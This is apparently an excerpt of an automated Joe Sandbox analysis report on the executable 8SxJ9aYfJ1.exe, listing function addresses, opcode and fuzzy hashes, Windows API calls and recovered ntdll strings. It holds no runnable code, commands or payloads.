Opcode Fuzzy Hash: 8a521a904dd5ff6b98d751bb325ffd87b8a27df44115b94850abd31b5c3a341f
Instruction Fuzzy Hash: C2B09BB7489035DFA620D57058094353E5CD144051309C591DA4A536434E111D1444A2

Function 073EC5C8 Relevance: .0, Instructions: 9COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2124124609.00000000073E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_73e0000_8SxJ9aYfJ1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 625b84c69c682ab537b53f0d1d7e52174286828787448bbbca74c78ce1954acd
Instruction ID: 5a3b668aad5d94f5813b97aa898254197b5e0752e73bd70ed6443a5c6ea59ffb
Opcode Fuzzy Hash: 625b84c69c682ab537b53f0d1d7e52174286828787448bbbca74c78ce1954acd
Instruction Fuzzy Hash: 1BC08076400050D9F7417790C5549557774AFE4340F44C412D0445A0A0DE319124FB03

Function 073E9DC8 Relevance: .0, Instructions: 9COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2124124609.00000000073E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_73e0000_8SxJ9aYfJ1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6c659dc019771a05f3ed5d1e193bf64b74068fbb62ca29041d09859ac049ec1f
Instruction ID: c1c17c7db75ddf985e99db027d8c8d93664ffd05e9d538837ba491c18e9bbe4b
Opcode Fuzzy Hash: 6c659dc019771a05f3ed5d1e193bf64b74068fbb62ca29041d09859ac049ec1f
Instruction Fuzzy Hash: 05C04CB6054220EAA641AB5586549AA7AADFFD6304B409895A14845160CA21E828A712

Function 073EA860 Relevance: .0, Instructions: 9COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2124124609.00000000073E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_73e0000_8SxJ9aYfJ1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 64fd00ac0933892510a01ceaec09996af5902f62192fa717e35d038097d67667
Instruction ID: 78b246f3f45974332667dbfe4f5909dccdb0034a1544e31ee6712b0792d0006b
Opcode Fuzzy Hash: 64fd00ac0933892510a01ceaec09996af5902f62192fa717e35d038097d67667
Instruction Fuzzy Hash: D9B011F00BCB3EC03800208B20A80383E0C00C3A28E00CAA3CA8F00CE00803AAA302AB

Function 073ECF0C Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2124124609.00000000073E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_73e0000_8SxJ9aYfJ1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3e8563c99e8ca267969763f6cc233d8c2e3009abf28c3efa5253b39481afb0ef
Instruction ID: ac5131318a3922340fc6656641f3059b6814e94eb3b33b9566b360aee245435c
Opcode Fuzzy Hash: 3e8563c99e8ca267969763f6cc233d8c2e3009abf28c3efa5253b39481afb0ef
Instruction Fuzzy Hash: 07B092A62B9220E6B4442668896092A69A8AFB3705B00990576081009084249825A62B

Function 073ECF10 Relevance: .0, Instructions: 7COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2124124609.00000000073E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_73e0000_8SxJ9aYfJ1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9df6501ea666ec54b8c19dc390298591f27d903c6bccdbfdf531c2dc93d14a44
Instruction ID: 231c181a8025e165e30d26b714e8503f7d66a8e1b2e238d0c3cd75a2607556f0
Opcode Fuzzy Hash: 9df6501ea666ec54b8c19dc390298591f27d903c6bccdbfdf531c2dc93d14a44
Instruction Fuzzy Hash: C2B012EA174220E8B50037B4885195E6B6DAFB3701F00C405A71C0009084340077A63B

Non-executed Functions

Function 06A76783 Relevance: 1.4, Strings: 1, Instructions: 131COMMON

Download Yara Rule

Strings

W, xrefs: 06A7678D

Memory Dump Source

Source File: 00000000.00000002.2123891487.0000000006A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a70000_8SxJ9aYfJ1.jbxd

Similarity

API ID:
String ID: W
API String ID: 0-655174618
Opcode ID: fad3639cf2649f7bb47c2d91eac1743c0178d7e9c832c65961cbdda64d9145a5
Instruction ID: 69fe6307592b4f2c4bececafff40ace56c075bb878abc0c9701d2ff52cee3a0d
Opcode Fuzzy Hash: fad3639cf2649f7bb47c2d91eac1743c0178d7e9c832c65961cbdda64d9145a5
Instruction Fuzzy Hash: 2A512F74E006598FDB14DFA9C980AAEFBF2BF89305F24C169D418AB355D7309942CFA1

Function 06A76530 Relevance: .5, Instructions: 473COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2123891487.0000000006A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a70000_8SxJ9aYfJ1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4902ed3c2983eeb4b554afca6c6ea9eceb32fc06edca6319b5969d326b953f9d
Instruction ID: 9621dfadc12834761208f27411b6a2686774cbb18f4650c32a489f66e0f2763d
Opcode Fuzzy Hash: 4902ed3c2983eeb4b554afca6c6ea9eceb32fc06edca6319b5969d326b953f9d
Instruction Fuzzy Hash: 68224974E006598FCB54EF99C980AADBBF2BF88305F24D159D418AB356D731ED42CBA0

Function 06A7DF68 Relevance: .4, Instructions: 362COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2123891487.0000000006A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a70000_8SxJ9aYfJ1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 67590259b6faba1931a9c2b137e5e0fe6259a8fe03f1747df2010897365faf03
Instruction ID: dd02b1a715e342583849da94256d416c256b9ddb4335fb2b0af73929b48334e1
Opcode Fuzzy Hash: 67590259b6faba1931a9c2b137e5e0fe6259a8fe03f1747df2010897365faf03
Instruction Fuzzy Hash: 01D19A31B006458FDBA9EB75C920BAEB7FBBFC9700F1544A9D1468B291CB35E901CB91

Function 06A74C80 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2123891487.0000000006A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a70000_8SxJ9aYfJ1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6baff9dcb425462b304c368490bd5c0f9854b5a06061f5e358a5250afa042f36
Instruction ID: d0799d0983aa52d00d0a9f45161b42fa9ca730b9562abc7b6ba0ff9344e2285f
Opcode Fuzzy Hash: 6baff9dcb425462b304c368490bd5c0f9854b5a06061f5e358a5250afa042f36
Instruction Fuzzy Hash: 32E1E674E002598FDB14DFA9C980AAEFBF2FF89305F248169D415AB355D730A942CFA0

Function 06A754F0 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2123891487.0000000006A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a70000_8SxJ9aYfJ1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b5d8660b785989a56f4e2d6a7d2f6dab5afde04ea84676365a74cfbbfeb1992b
Instruction ID: a05242ecf8dc6c83ca8b887b1d435ad3d226d3a127c8b4fd79cac34e130efb14
Opcode Fuzzy Hash: b5d8660b785989a56f4e2d6a7d2f6dab5afde04ea84676365a74cfbbfeb1992b
Instruction Fuzzy Hash: D5E1EA74E102598FDB14DFA9C980AAEFBF2BF89305F24C159D415AB355DB30A941CFA0

Function 06A750B8 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2123891487.0000000006A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a70000_8SxJ9aYfJ1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a679cb281a7f13ed0961fa2d69e068bf1fcb60946b3e250ac4c3518895811edc
Instruction ID: 6713ac4cb6c3cd1cdb7040aa26c7abdf204b1265116925157f18beba2eef9629
Opcode Fuzzy Hash: a679cb281a7f13ed0961fa2d69e068bf1fcb60946b3e250ac4c3518895811edc
Instruction Fuzzy Hash: 82E1FB74E002598FDB14DFA9C980AAEFBF2BF89305F24C169D415AB355DB30A941CFA0

Function 06A77140 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2123891487.0000000006A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a70000_8SxJ9aYfJ1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f5921ddcd2ff155530d8527bb4700da0bec22317372763096054c8c37f47da38
Instruction ID: 4836452cecf909a1f5d3a0f991f200d28df47aaa7d7ba81a86cdb51ed0081a24
Opcode Fuzzy Hash: f5921ddcd2ff155530d8527bb4700da0bec22317372763096054c8c37f47da38
Instruction Fuzzy Hash: 69E1EB74E002598FDB54DFA9C980AAEFBF2BF89305F24C169D815AB355D730A941CFA0

Function 025ED304 Relevance: .3, Instructions: 264COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2117883220.00000000025E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_25e0000_8SxJ9aYfJ1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8f75bf85a69ffadf55f3c03dd4586326be976c187003247fdfd2251ee57a6db0
Instruction ID: 6ab727e63a671992408fa0ed53b2edc6286d3d921ec2ebdacc6b519a2ccd3202
Opcode Fuzzy Hash: 8f75bf85a69ffadf55f3c03dd4586326be976c187003247fdfd2251ee57a6db0
Instruction Fuzzy Hash: 9AA14D36E00216CFCF19DFA4C8445AEBBB2FF85304B15856AE906AB265DF71E916CF40

Function 073ED670 Relevance: .3, Instructions: 264COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2124124609.00000000073E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_73e0000_8SxJ9aYfJ1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bcbf3e347404a180a81abc63f37e64d914cb859d34a1f5e245626beb2fe93753
Instruction ID: ae915458f2fe874a00c610dde9d16de03daca4b26366844b5d90c1a3345aa520
Opcode Fuzzy Hash: bcbf3e347404a180a81abc63f37e64d914cb859d34a1f5e245626beb2fe93753
Instruction Fuzzy Hash: DFD1E731D2075ADADB10EBA4D990B99B7B1FF96300F20C79AD24937254FB706AC5CB81

Function 073ED672 Relevance: .3, Instructions: 263COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2124124609.00000000073E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_73e0000_8SxJ9aYfJ1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fe0f4e3faf1b55f3f082137de362bdcc2b9979f301038a5133dd577e86ef236e
Instruction ID: c8e9421152e1ca844690dd2522e562e35f4228109e3aee1bc8886bc890835a21
Opcode Fuzzy Hash: fe0f4e3faf1b55f3f082137de362bdcc2b9979f301038a5133dd577e86ef236e
Instruction Fuzzy Hash: 4FD1E731D2075ADADB10EBA4D990B99B7B1FF95300F20C79AD24937254FB706AC5CB81

Function 06A77131 Relevance: .1, Instructions: 130COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2123891487.0000000006A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a70000_8SxJ9aYfJ1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0578d6a5d91f3f78e62a0f0136ea2ca5e3d531420725d5d3078e439bd4bf1af5
Instruction ID: 7a9321fd003bfb57df21310a92f5cf0c851304d715e77882043c5f75dffdd42b
Opcode Fuzzy Hash: 0578d6a5d91f3f78e62a0f0136ea2ca5e3d531420725d5d3078e439bd4bf1af5
Instruction Fuzzy Hash: 5B510E70E042598FDB14DFA9C9409AEFBF2BF89305F24C1A9D418AB355D7309942CFA1

Function 06A76790 Relevance: .1, Instructions: 127COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2123891487.0000000006A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a70000_8SxJ9aYfJ1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ceb807809acc6e9c5070ebd8fcef9a48a626d81473eebc451c27585e9473cd60
Instruction ID: a40ad1d3d71973e9bbb5ab81f0a9025d27e64bf0499c2f42c69c1905441fa0f0
Opcode Fuzzy Hash: ceb807809acc6e9c5070ebd8fcef9a48a626d81473eebc451c27585e9473cd60
Instruction Fuzzy Hash: A751FD74E006598FDB14DFAAC980AAEFBF2BF89305F24C169D418A7355D7309942CFA1

Analysis Process: 8SxJ9aYfJ1.exePID: 4896, Parent PID: 6064COMMON

Execution Graph

Execution Coverage:	1.2%
Dynamic/Decrypted Code Coverage:	5.4%
Signature Coverage:	9.3%
Total number of Nodes:	129
Total number of Limit Nodes:	9

Executed Functions

Function 00417B33 Relevance: 1.5, APIs: 1, Instructions: 48
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417BA5

Memory Dump Source

Source File: 0000000A.00000002.2391710518.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_8SxJ9aYfJ1.jbxd

Yara matches

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: 876bccc2b2c7ed25f37d51ce60514c1c53331ecefcaf0c9d4b9a0d589cfb5623
Instruction ID: 4511701901aca23bd92af1f8b7fe6ee1f31152ede32fb4fe04172c4847d76a74
Opcode Fuzzy Hash: 876bccc2b2c7ed25f37d51ce60514c1c53331ecefcaf0c9d4b9a0d589cfb5623
Instruction Fuzzy Hash: 4B0171B5E0420DBBDF10DBE5DC42FDEB3789B54308F0081AAE90897240F635EB488BA5

Function 0042C013 Relevance: 1.5, APIs: 1, Instructions: 25
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtClose.NTDLL(?,?,00000000,00000000,0000001F,?,FA0A1F00), ref: 0042C047

Memory Dump Source

Source File: 0000000A.00000002.2391710518.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_8SxJ9aYfJ1.jbxd

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: 5facd95861b902a075f2d71b1c868aba0859ee95fc646fd81da9fa107de3279d
Instruction ID: b0dde98931ad171eca1157316b47897ba6b5760d7da097af93189e8d4a6e5d5b
Opcode Fuzzy Hash: 5facd95861b902a075f2d71b1c868aba0859ee95fc646fd81da9fa107de3279d
Instruction Fuzzy Hash: 3CE04F766406147BE620AA9AEC41FDB775CDFC5714F40441AFA0C67142C6B5BA5086F4

Function 01672B60 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 01672B6A

Memory Dump Source

Source File: 0000000A.00000002.2392690731.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1600000_8SxJ9aYfJ1.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: b513b63147641eee450573e7b0ef7c5ef69d85a89e71a6ad1e9a9a911e93074f
Instruction ID: 257ee6f4691d5aeb9ff7d329ed18a8764970e55b0fdb6b7eb0f2b8adcab13555
Opcode Fuzzy Hash: b513b63147641eee450573e7b0ef7c5ef69d85a89e71a6ad1e9a9a911e93074f
Instruction Fuzzy Hash: 0690026120240003410575584854617900F97E0301B95C121E5014694EC52589916225

Function 01672DF0 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 01672DFA

Memory Dump Source

Source File: 0000000A.00000002.2392690731.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1600000_8SxJ9aYfJ1.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 7e0477e172ce9848950cde5b3489a1e3861ce84bca72ba8978320a2c11cbf859
Instruction ID: bd5cc0e7e9cfe75fdde6058408e791a5d1253543e86c197f74e48c7122ba8430
Opcode Fuzzy Hash: 7e0477e172ce9848950cde5b3489a1e3861ce84bca72ba8978320a2c11cbf859
Instruction Fuzzy Hash: 0790023120140413D11175584944707500E97D0341FD5C512A442465CED6568A52A221

Function 01672C70 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 01672C7A

Memory Dump Source

Source File: 0000000A.00000002.2392690731.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1600000_8SxJ9aYfJ1.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 87a34193e999f5f5aa0f233858b76de4cabaff4e85dc20ff60a456359a59377c
Instruction ID: 28b830a0436ec01d3d503c63043326f2e13dcf2d3c92ba18d43c8cbf200a282b
Opcode Fuzzy Hash: 87a34193e999f5f5aa0f233858b76de4cabaff4e85dc20ff60a456359a59377c
Instruction Fuzzy Hash: D590023120148802D1107558884474B500A97D0301F99C511A842475CEC69589917221

Function 016735C0 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 016735CA

Memory Dump Source

Source File: 0000000A.00000002.2392690731.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1600000_8SxJ9aYfJ1.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: dc3ad8e5aba94c3f6dfe80e62acf656fc8296abd67b9a02126911d81f65bd692
Instruction ID: d240e07392bf4aba2b2a58b59623eabd7aa0899ad997900e13dcd77e36371a5b
Opcode Fuzzy Hash: dc3ad8e5aba94c3f6dfe80e62acf656fc8296abd67b9a02126911d81f65bd692
Instruction Fuzzy Hash: 3F90023160550402D10075584954707600A97D0301FA5C511A442466CEC7958A5166A2

Function 00413F8F Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 66
threadwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PostThreadMessageW.USER32(s822635O8R,00000111,00000000,00000000), ref: 00414040

Strings

s822635O8R, xrefs: 00414033, 0041403F, 00414050
s822635O8R, xrefs: 00414047, 0041404A

Memory Dump Source

Source File: 0000000A.00000002.2391710518.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_8SxJ9aYfJ1.jbxd

Yara matches

Similarity

API ID: MessagePostThread
String ID: s822635O8R$s822635O8R
API String ID: 1836367815-1039775667
Opcode ID: 1152259fdd150f3a435c1c0d273777721392f356d7026b94c20cee7e7c179a27
Instruction ID: c1c48e5c724715440a8097798e8abea6f04e8c1daedde44f12c4c1227deaf7a5
Opcode Fuzzy Hash: 1152259fdd150f3a435c1c0d273777721392f356d7026b94c20cee7e7c179a27
Instruction Fuzzy Hash: A211C032E041243AD7118FA99845BEEFF68EFC1B24F04819BE604DF341DAB58E4283D9

Function 00413FC3 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 57
threadwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PostThreadMessageW.USER32(s822635O8R,00000111,00000000,00000000), ref: 00414040

Strings

s822635O8R, xrefs: 00414033, 0041403F, 00414050
s822635O8R, xrefs: 00414047, 0041404A

Memory Dump Source

Source File: 0000000A.00000002.2391710518.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_8SxJ9aYfJ1.jbxd

Yara matches

Similarity

API ID: MessagePostThread
String ID: s822635O8R$s822635O8R
API String ID: 1836367815-1039775667
Opcode ID: fd9342b272bb49d8831eaa25200bf9cbc2b94732feeb34b574a7a5760efdb49f
Instruction ID: bc90bb67909662bab0c93d7d09bf3bd82ba61888a33ed3c07d6c531d5c69f0b1
Opcode Fuzzy Hash: fd9342b272bb49d8831eaa25200bf9cbc2b94732feeb34b574a7a5760efdb49f
Instruction Fuzzy Hash: 5F01D631E4521876EB209692DC02FDFBB7C9F81B14F048159FB147F2C0E6B8560687EA

Function 0042C373 Relevance: 1.5, APIs: 1, Instructions: 29
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlFreeHeap.NTDLL(00000000,00000004,00000000,EF6577DD,00000007,00000000,00000004,00000000,004173B4,000000F4), ref: 0042C3B2

Memory Dump Source

Source File: 0000000A.00000002.2391710518.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_8SxJ9aYfJ1.jbxd

Yara matches

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 9d1e2982d0fea4444168b1638d19aa740bf282eb240f63777ef402b6fe3c2276
Instruction ID: 059359e572929b533ddf7c04db5a91603cbcc6452a19f33145311c216c645a6a
Opcode Fuzzy Hash: 9d1e2982d0fea4444168b1638d19aa740bf282eb240f63777ef402b6fe3c2276
Instruction Fuzzy Hash: 32E06D76604204BBD610EE99EC41F9B33ACEFC4710F00441AF918A7242C671BD1086B8

Function 0042C323 Relevance: 1.5, APIs: 1, Instructions: 29
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL(?,0041E544,?,?,00000000,?,0041E544,?,?,?), ref: 0042C35F

Memory Dump Source

Source File: 0000000A.00000002.2391710518.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_8SxJ9aYfJ1.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 7dcd3e36e3d4f8f7f9affdc8184745b4562dea2e3ab812be59b9e0ae5b77fcc0
Instruction ID: fe75b5843f201106695870a5fc9a611e417cd740c7982b436a3ec0b6764f5273
Opcode Fuzzy Hash: 7dcd3e36e3d4f8f7f9affdc8184745b4562dea2e3ab812be59b9e0ae5b77fcc0
Instruction Fuzzy Hash: 86E06DB66042047BD610EE99EC41F9B37ACEFC5714F008419FA08A7281C671B91087B9

Function 0042C3C3 Relevance: 1.5, APIs: 1, Instructions: 25
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ExitProcess.KERNEL32(?,00000000,?,?,C3705FE8,?,?,C3705FE8), ref: 0042C3F7

Memory Dump Source

Source File: 0000000A.00000002.2391710518.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_8SxJ9aYfJ1.jbxd

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: 347f933b8ad0c3b631d526e3724446beb9086f226aef2ffd6de7fa47002abd48
Instruction ID: 9160ebbb7515cdf4d0b4e51eeea59c13ed0bcbb2c1a983facfce3481c0abb250
Opcode Fuzzy Hash: 347f933b8ad0c3b631d526e3724446beb9086f226aef2ffd6de7fa47002abd48
Instruction Fuzzy Hash: DCE04F766402147BD220AB5AEC41F97775DDBC5714F00845AFA08A7181C675B91187B8

Function 01672C0A Relevance: 1.5, APIs: 1, Instructions: 8
libraryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 01672C24

Memory Dump Source

Source File: 0000000A.00000002.2392690731.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1600000_8SxJ9aYfJ1.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: e2c4ece88aa474fe0faf708e6a9506619505fa41afe0de4064834f09771e173d
Instruction ID: a007f69033aac91eea3b2efbabe2b783b310ecca808f24ce46b4089622408628
Opcode Fuzzy Hash: e2c4ece88aa474fe0faf708e6a9506619505fa41afe0de4064834f09771e173d
Instruction Fuzzy Hash: 25B09B719015C5C5DA51F7644E08717790577D0701F55C165D3030755F4738C1D1E275

Non-executed Functions

Function 016B2349 Relevance: 26.1, Strings: 20, Instructions: 1117COMMON

Download Yara Rule

Strings

FrontEndHeapDebugOptions, xrefs: 016B2489
RaiseExceptionOnPossibleDeadlock, xrefs: 016B2579
UseImpersonatedDeviceMap, xrefs: 016B251C
MaxLoaderThreads, xrefs: 016B24EC
DisableExceptionChainValidation, xrefs: 016B275F
MinimumStackCommitInBytes, xrefs: 016B2BB0
ShutdownFlags, xrefs: 016B24A1
minkernel\ntdll\ldrinit.c, xrefs: 016B3187
@, xrefs: 016B2B74
UnloadEventTraceDepth, xrefs: 016B24C0
GlobalFlag, xrefs: 016B2F3F, 016B3059
TracingFlags, xrefs: 016B2549
CFGOptions, xrefs: 016B2967
@, xrefs: 016B2942
MaxDeadActivationContexts, xrefs: 016B2D82
LdrpInitializeExecutionOptions, xrefs: 016B317D
GlobalFlag2, xrefs: 016B2FC0
DisableHeapLookaside, xrefs: 016B246D
Initializing the application verifier package failed with status 0x%08lx, xrefs: 016B3176
ExecuteOptions, xrefs: 016B25A0

Memory Dump Source

Source File: 0000000A.00000002.2392690731.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1600000_8SxJ9aYfJ1.jbxd

Similarity

API ID:
String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
API String ID: 0-2160512332
Opcode ID: fc502a2d1394ef46f5637b2d69a9232f6ee8567951f96002fdb5e6176f5f402b
Instruction ID: b2c854b8ab92919f2d925c835bc1f5b64657a2a080aceb73f821b14990e221cc
Opcode Fuzzy Hash: fc502a2d1394ef46f5637b2d69a9232f6ee8567951f96002fdb5e6176f5f402b
Instruction Fuzzy Hash: 5592AC71604342ABE721DF28CC90BABBBE9BB84714F04492DFA95D7350D770E885CB96

Function 01668620 Relevance: 17.7, Strings: 14, Instructions: 223COMMON

Download Yara Rule

Strings

Invalid debug info address of this critical section, xrefs: 016A54B6
double initialized or corrupted critical section, xrefs: 016A5508
Critical section address., xrefs: 016A5502
Thread identifier, xrefs: 016A553A
Critical section debug info address, xrefs: 016A541F, 016A552E
8, xrefs: 016A52E3
Critical section address, xrefs: 016A5425, 016A54BC, 016A5534
undeleted critical section in freed memory, xrefs: 016A542B
corrupted critical section, xrefs: 016A54C2
Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 016A54CE
Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 016A540A, 016A5496, 016A5519
Thread is in a state in which it cannot own a critical section, xrefs: 016A5543
Address of the debug info found in the active list., xrefs: 016A54AE, 016A54FA
First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 016A54E2

Memory Dump Source

Source File: 0000000A.00000002.2392690731.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1600000_8SxJ9aYfJ1.jbxd

